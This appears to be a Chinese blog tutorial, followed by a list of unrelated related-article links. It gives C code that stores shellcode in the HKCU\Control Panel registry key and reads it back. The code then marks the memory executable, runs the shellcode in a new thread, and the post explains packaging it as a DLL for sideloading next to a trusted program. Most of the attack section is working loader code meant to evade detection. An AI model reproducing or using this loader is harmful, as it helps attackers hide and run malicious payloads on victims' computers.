当前位置: 首页 > news >正文

、写入Shellcode到注册表上线

其实本质就是将shellcode写入到注册表中,然后读取注册表中的shellcode,然后创建线程去执行shellcode。

如下图:
在这里插入图片描述

写入注册表shellcode

这里将shellcode写入到注册表中,在我们需要的时候再去读取然后执行。

这里用到如下两个Windows API函数。

RegOpenKeyExA
RegSetValueExA
RegOpenKeyExA
LSTATUS RegOpenKeyExA([in]           HKEY   hKey,[in, optional] LPCSTR lpSubKey,[in]           DWORD  ulOptions,[in]           REGSAM samDesired,[out]          PHKEY  phkResult
);

第一个参数需要的是打开注册表的句柄。

第二个参数表示要打开注册表子项的句柄。

第三个参数表示指定要在打开密钥时应用的选项。

最重要是的是第四个参数是对注册表的访问权限,因为我们要在注册表下创建一个String Value,所以这里的权限我们设置为KEY_SET_VALUE即可。

如下代码:

RegOpenKeyExA(HKEY_CURRENT_USER,REGISTRY,0,KEY_SET_VALUE,&keys);

接下来就是设置注册表的值了。

这里使用的是RegSetValueExA函数 如下:

LSTATUS RegSetValueExA([in]           HKEY       hKey,[in, optional] LPCSTR     lpValueName,DWORD      Reserved,[in]           DWORD      dwType,[in]           const BYTE *lpData,[in]           DWORD      cbData
);

第一个参数就是注册表的句柄,而且它的权限必须是KEY_SET_VALUE,也就是我们上面设置的。

第二个参数是我们要设置值的名称,就是注册表里面值得名称,第三个参数是保留参数必须为0,第四个参数是注册表里面值得类型,这里指定为REG_BINARY,表示任意的二进制数据,这里可以参考微软官网: Registry value types - Win32 apps | Microsoft Learn

第五个参数表示你要存储的数据,也就是你的shellcode,最后一个参数是你shellcode的大小。

如下代码实现:

#define REGISTRY "Control Panel" //这里是写入注册表的目录 也就是 计算机\HKEY_CURRENT_USER\Control Panel
#define REGSTRING "relaysec" //定义你注册表写入值得名字
BOOL WirteShellcodeRegister(PBYTE shellcode,DWORD shellcodeSize) {BOOL        bs = TRUE;LSTATUS     sts = NULL;HKEY        keys = NULL;sts = RegOpenKeyExA(HKEY_CURRENT_USER,REGISTRY,0, KEY_SET_VALUE, &keys);if(sts == NULL){bs = FALSE;}sts = RegSetValueExA(keys, REGSTRING, 0, REG_BINARY, shellcode, shellcodeSize);if(sts == NULL){bs = FALSE;}
_EndOfFunction:if (keys)RegCloseKey(keys);return bs;
}

成功写入:
在这里插入图片描述
写入之后我们接下来要进行读取注册表中的shellcode。

读取注册表shellcode

这里需要用到如下的Windows API函数:

RegGetValueA
HeapAlloc
RegGetValueA
LSTATUS RegGetValueA([in]                HKEY    hkey,[in, optional]      LPCSTR  lpSubKey,[in, optional]      LPCSTR  lpValue,[in, optional]      DWORD   dwFlags,[out, optional]     LPDWORD pdwType,[out, optional]     PVOID   pvData,[in, out, optional] LPDWORD pcbData
);

第一个参数依旧是注册表项的句柄,而且必须是KEY_QUERY_VALUE权限的。

第二个参数填写注册表的路径,它将从子项中检索注册表的值。

第三个参数表示注册表的名称。

第四个参数用于限制数据类型,如果值的数据类型不符合此条件,则函数将失败,这里我们设置RRF_RT_ANY即可,没有类型限制。

第五个参数是存储在指定值中的数据类型的代码,一般设置为NULL。

第六个参数表示接收存储在指定值的指针,如果不需要值得话也可以设置为NULL。

最后一个参数接收值数据的缓冲区的指针,这里我们设置接收一下即可。

如下完整代码:

BOOL ReadShellcodeRegister(PBYTE* shellcode, SIZE_T* shellcodeSize) {LSTATUS    sts = NULL;DWORD		dread = NULL;PVOID		ps = NULL;sts = RegGetValueA(HKEY_CURRENT_USER, REGISTRY, REGSTRING, RRF_RT_ANY, NULL, NULL, &dread);if (sts !=0L) {return FALSE;}ps = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dread);if (ps == NULL) {return FALSE;}sts = RegGetValueA(HKEY_CURRENT_USER, REGISTRY, REGSTRING, RRF_RT_ANY, NULL, ps, &dread);if (sts != 0L) {return FALSE;}*shellcode = (PBYTE)ps;*shellcodeSize = dread;return TRUE;
}

这里为什么要读取两次,因为第一次读取的是注册表项,第二次才是值。
在这里插入图片描述
读取到值之后然后赋值给shellcode。

读取完成之后就是执行了,这里我们使用创建线程的方式去执行。

首先申请一块内存:

BOOL executeShellcode(PVOID shellcode, SIZE_T shellcodeSize){DWORD dwOldProtection = NULL;PVOID shellcodeAddress = shellcodeAddress = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, 	  PAGE_READWRITE);
}

在这里插入图片描述
申请内存之后将shellcode复制进去。

BOOL executeShellcode(PVOID shellcode, SIZE_T shellcodeSize){DWORD dwOldProtection = NULL;PVOID shellcodeAddress = shellcodeAddress = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, 	  PAGE_READWRITE);if (shellcodeAddress == NULL) {return FALSE;}memcpy(shellcodeAddress, shellcode, shellcodeSize);memset(shellcode, '\0', shellcodeSize);
}

在这里插入图片描述
copy进去之后将权限更改为PAGE_EXECUTE_READWRITE,然后创建线程执行。

BOOL executeShellcode(PVOID shellcode, SIZE_T shellcodeSize){DWORD dpOld = NULL;PVOID shellcodeAddress = shellcodeAddress = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, 	  PAGE_READWRITE);if (shellcodeAddress == NULL) {return FALSE;}memcpy(shellcodeAddress, shellcode, shellcodeSize);memset(shellcode, '\0', shellcodeSize);if (!VirtualProtect(shellcodeAddress, shellcodeSize, PAGE_EXECUTE_READWRITE, &dpOld)) {return FALSE;}getchar();if (CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)shellcodeAddress, NULL, NULL, NULL) == NULL) {return FALSE;}return TRUE;
}

在这里插入图片描述

集成到白加黑中

我们直接将前面所写的写入,读取,执行这三部的代码copy到dll中,然后放到导出函数去执行即可。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
白程序前面文章回复消息可以拿。

相关文章:

  • Postgresql源码(118)elog/ereport报错跳转功能分析
  • 麒麟信安日志轮询分割操作说明
  • 自学黑客(网络安全)技术——高效学习
  • 计算机网络笔记-韩立刚-第六章-应用层
  • Go语言 相关概念深入分析
  • 2-高可用-负载均衡、反向代理
  • 系列十一(面试)、如何查看JVM的参数?
  • pycharm git 版本回退
  • 先进制造身份治理现状洞察:从手动运维迈向自动化身份治理时代
  • 智能优化算法应用:基于卷尾猴算法3D无线传感器网络(WSN)覆盖优化 - 附代码
  • NPM介绍与使用
  • 导入conda虚拟环境的lib
  • 166. 数独(DFS之剪枝与优化:位运算优化,优化搜索顺序,.可行性剪枝)
  • GLTF/GLB模型在线预览、编辑、动画查看以及材质修改
  • 4.3 C++对象模型和this指针
  • [微信小程序] 使用ES6特性Class后出现编译异常
  • 【108天】Java——《Head First Java》笔记(第1-4章)
  • 30秒的PHP代码片段(1)数组 - Array
  • HTTP中的ETag在移动客户端的应用
  • JDK 6和JDK 7中的substring()方法
  • Laravel Telescope:优雅的应用调试工具
  • Linux编程学习笔记 | Linux IO学习[1] - 文件IO
  • PHP CLI应用的调试原理
  • SpiderData 2019年2月13日 DApp数据排行榜
  • 从零开始学习部署
  • 短视频宝贝=慢?阿里巴巴工程师这样秒开短视频
  • 对话 CTO〡听神策数据 CTO 曹犟描绘数据分析行业的无限可能
  • 每个JavaScript开发人员应阅读的书【1】 - JavaScript: The Good Parts
  • 面试总结JavaScript篇
  • 使用common-codec进行md5加密
  • 树莓派 - 使用须知
  • 微信公众号开发小记——5.python微信红包
  • 由插件封装引出的一丢丢思考
  • 继 XDL 之后,阿里妈妈开源大规模分布式图表征学习框架 Euler ...
  • 容器镜像
  • ​LeetCode解法汇总2808. 使循环数组所有元素相等的最少秒数
  • (c语言版)滑动窗口 给定一个字符串,只包含字母和数字,按要求找出字符串中的最长(连续)子串的长度
  • (非本人原创)史记·柴静列传(r4笔记第65天)
  • (附源码)spring boot火车票售卖系统 毕业设计 211004
  • (附源码)计算机毕业设计ssm基于Internet快递柜管理系统
  • (教学思路 C#之类三)方法参数类型(ref、out、parmas)
  • (一)认识微服务
  • (原創) 如何刪除Windows Live Writer留在本機的文章? (Web) (Windows Live Writer)
  • (转)Android中使用ormlite实现持久化(一)--HelloOrmLite
  • ***通过什么方式***网吧
  • .NET 使用 XPath 来读写 XML 文件
  • .NET正则基础之——正则委托
  • .net中调用windows performance记录性能信息
  • @converter 只能用mysql吗_python-MySQLConverter对象没有mysql-connector属性’...
  • @kafkalistener消费不到消息_消息队列对战之RabbitMq 大战 kafka
  • @LoadBalanced 和 @RefreshScope 同时使用,负载均衡失效分析
  • [ Linux 长征路第二篇] 基本指令head,tail,date,cal,find,grep,zip,tar,bc,unname
  • [Android Pro] Notification的使用
  • [android] 练习PopupWindow实现对话框
  • [C++]C++基础知识概述